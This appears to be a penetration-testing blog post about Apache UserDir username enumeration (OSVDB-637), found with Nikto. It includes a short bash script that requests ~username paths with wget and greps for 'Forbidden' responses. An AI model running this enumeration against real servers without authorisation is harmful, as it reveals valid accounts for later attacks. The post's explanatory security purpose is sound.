I ran a Nikto scan and found the following vulnerability in the report that it produces:
"OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users)."
I then created the following bash script to run through a list of usernames to identify users that may exist:
#!/bin/bash
while read line
do
wget http://www.domain.local/~$line &> output/$line.output.file
done < names.list
grep -l -i 'forbidden' output/*
The last statement will then identify the files that are proceeded by a username that return indicating the user account exists on the particular apache server.
Below is the information about the vulnerability from the OSVDB database...
http://osvdb.org/637
Apache web servers contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when the UserDir module is enabled and a remote attacker requests access to a user's home directory. By monitoring the web server response, an attacker is able to enumerate valid user names, resulting in a loss of confidentiality.
Subscribe to:
Post Comments (Atom)
-
Here is a quick walk through of GetBoo. The first item that I found was you can harvest the usernames of the existing users that are regist... -
As I was glancing through the logs of my honeypots I spent some time to look at the following logs. In the past I have just overlooked them... -
I ran a Nikto scan and found the following vulnerability in the report that it produces: "OSVDB-637: Enumeration of users is possible...
-
I thought I would work through a few of these web applications provided by OWASP on their broken web applications VM. The first one I th... -
In the honeypot I found over 276 requests for cgi files that could be accessed to leverage the shellshock vulnerability documented as CVE-20...
No comments:
Post a Comment